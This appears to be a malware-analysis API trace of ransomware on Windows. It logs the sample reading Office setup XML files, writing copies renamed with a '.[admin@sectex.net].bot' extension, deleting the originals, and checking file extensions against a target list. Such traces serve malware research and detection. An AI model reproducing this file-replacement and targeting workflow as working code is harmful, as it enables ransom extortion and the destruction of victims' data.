	[0039.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.669] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.669] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.669] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.669] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.669] GetLastError () returned 0x0
	[0039.669] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x41d4, lpOverlapped=0x0) returned 1
	[0039.671] WriteFile (in: hFile=0x190, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x41e0, lpOverlapped=0x0) returned 1
	[0039.672] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.672] WriteFile (in: hFile=0x190, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0039.672] SetEndOfFile (hFile=0x190) returned 1
	[0039.673] CloseHandle (hObject=0x190) returned 1
	[0039.674] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.674] SetEndOfFile (hFile=0x1f4) returned 1
	[0039.674] CloseHandle (hObject=0x1f4) returned 1
	[0039.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.675] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 1
	[0039.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.675] lstrlenW (lpString=".doc") returned 4
	[0039.675] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.675] lstrlenW (lpString=".docx") returned 5
	[0039.675] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0039.675] lstrlenW (lpString=".pdf") returned 4
	[0039.675] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.675] lstrlenW (lpString=".xls") returned 4
	[0039.675] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.675] lstrlenW (lpString=".xlsx") returned 5
	[0039.675] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0039.675] lstrlenW (lpString=".ppt") returned 4
	[0039.675] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.675] lstrlenW (lpString=".zip") returned 4
	[0039.675] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.675] lstrlenW (lpString=".rar") returned 4
	[0039.676] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString=".bz2") returned 4
	[0039.676] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString=".7z") returned 3
	[0039.676] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.676] lstrlenW (lpString=".dbf") returned 4
	[0039.676] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.676] lstrlenW (lpString=".1cd") returned 4
	[0039.676] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.676] lstrlenW (lpString=".jpg") returned 4
	[0039.676] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.676] lstrlenW (lpString=".doc") returned 4
	[0039.676] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString=".docx") returned 5
	[0039.676] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0039.676] lstrlenW (lpString=".pdf") returned 4
	[0039.676] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString=".xls") returned 4
	[0039.676] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString=".xlsx") returned 5
	[0039.676] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0039.676] lstrlenW (lpString=".ppt") returned 4
	[0039.676] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.676] lstrlenW (lpString=".zip") returned 4
	[0039.676] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.676] lstrlenW (lpString=".rar") returned 4
	[0039.676] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.677] lstrlenW (lpString=".bz2") returned 4
	[0039.677] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.677] lstrlenW (lpString=".7z") returned 3
	[0039.677] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.677] lstrlenW (lpString=".dbf") returned 4
	[0039.677] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.677] lstrlenW (lpString=".1cd") returned 4
	[0039.677] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103
	[0039.677] lstrlenW (lpString=".jpg") returned 4
	[0039.677] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.677] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.677] lstrlenW (lpString="SETUP.XML") returned 9
	[0039.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.678] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=31094) returned 1
	[0039.678] CloseHandle (hObject=0x1f4) returned 1
	[0039.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 0x20
	[0039.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.678] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.678] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.680] GetLastError () returned 0x0
	[0039.680] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x7976, lpOverlapped=0x0) returned 1
	[0039.682] WriteFile (in: hFile=0x190, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x7980, lpOverlapped=0x0) returned 1
	[0039.683] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.683] WriteFile (in: hFile=0x190, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.683] SetEndOfFile (hFile=0x190) returned 1
	[0039.683] CloseHandle (hObject=0x190) returned 1
	[0039.684] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.684] SetEndOfFile (hFile=0x1f4) returned 1
	[0039.685] CloseHandle (hObject=0x1f4) returned 1
	[0039.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.686] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1
	[0039.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.686] lstrlenW (lpString=".doc") returned 4
	[0039.686] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.686] lstrlenW (lpString=".docx") returned 5
	[0039.686] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.686] lstrlenW (lpString=".pdf") returned 4
	[0039.686] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.686] lstrlenW (lpString=".xls") returned 4
	[0039.686] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.686] lstrlenW (lpString=".xlsx") returned 5
	[0039.686] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.686] lstrlenW (lpString=".ppt") returned 4
	[0039.686] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.686] lstrlenW (lpString=".zip") returned 4
	[0039.686] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.686] lstrlenW (lpString=".rar") returned 4
	[0039.686] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.686] lstrlenW (lpString=".bz2") returned 4
	[0039.686] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.686] lstrlenW (lpString=".7z") returned 3
	[0039.686] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.686] lstrlenW (lpString=".dbf") returned 4
	[0039.687] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.687] lstrlenW (lpString=".1cd") returned 4
	[0039.687] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.687] lstrlenW (lpString=".jpg") returned 4
	[0039.687] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.687] lstrlenW (lpString=".doc") returned 4
	[0039.687] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString=".docx") returned 5
	[0039.687] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.687] lstrlenW (lpString=".pdf") returned 4
	[0039.687] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString=".xls") returned 4
	[0039.687] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString=".xlsx") returned 5
	[0039.687] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.687] lstrlenW (lpString=".ppt") returned 4
	[0039.687] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.687] lstrlenW (lpString=".zip") returned 4
	[0039.687] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.687] lstrlenW (lpString=".rar") returned 4
	[0039.687] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString=".bz2") returned 4
	[0039.687] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString=".7z") returned 3
	[0039.687] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.687] lstrlenW (lpString=".dbf") returned 4
	[0039.687] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.688] lstrlenW (lpString=".1cd") returned 4
	[0039.688] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.688] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98
	[0039.688] lstrlenW (lpString=".jpg") returned 4
	[0039.688] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.688] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.688] lstrlenW (lpString="PublisherMUI.XML") returned 16
	[0039.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.688] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1450) returned 1
	[0039.688] CloseHandle (hObject=0x1f4) returned 1
	[0039.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 0x20
	[0039.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.688] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.689] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0039.999] GetLastError () returned 0x0
	[0039.999] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x5aa, lpOverlapped=0x0) returned 1
	[0040.011] WriteFile (in: hFile=0x1a0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0040.011] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.012] WriteFile (in: hFile=0x1a0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0040.012] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.012] CloseHandle (hObject=0x1a0) returned 1
	[0040.013] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.013] SetEndOfFile (hFile=0x1f4) returned 1
	[0040.013] CloseHandle (hObject=0x1f4) returned 1
	[0040.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.014] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1
	[0040.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.014] lstrlenW (lpString=".doc") returned 4
	[0040.014] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.014] lstrlenW (lpString=".docx") returned 5
	[0040.014] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0040.014] lstrlenW (lpString=".pdf") returned 4
	[0040.014] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.014] lstrlenW (lpString=".xls") returned 4
	[0040.014] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.014] lstrlenW (lpString=".xlsx") returned 5
	[0040.014] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0040.014] lstrlenW (lpString=".ppt") returned 4
	[0040.014] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.014] lstrlenW (lpString=".zip") returned 4
	[0040.014] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.014] lstrlenW (lpString=".rar") returned 4
	[0040.014] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.014] lstrlenW (lpString=".bz2") returned 4
	[0040.014] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.014] lstrlenW (lpString=".7z") returned 3
	[0040.015] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.015] lstrlenW (lpString=".dbf") returned 4
	[0040.015] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.015] lstrlenW (lpString=".1cd") returned 4
	[0040.015] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.015] lstrlenW (lpString=".jpg") returned 4
	[0040.015] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.015] lstrlenW (lpString=".doc") returned 4
	[0040.015] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString=".docx") returned 5
	[0040.015] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0040.015] lstrlenW (lpString=".pdf") returned 4
	[0040.015] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString=".xls") returned 4
	[0040.015] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString=".xlsx") returned 5
	[0040.015] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0040.015] lstrlenW (lpString=".ppt") returned 4
	[0040.015] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.015] lstrlenW (lpString=".zip") returned 4
	[0040.015] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.015] lstrlenW (lpString=".rar") returned 4
	[0040.015] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString=".bz2") returned 4
	[0040.015] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.015] lstrlenW (lpString=".7z") returned 3
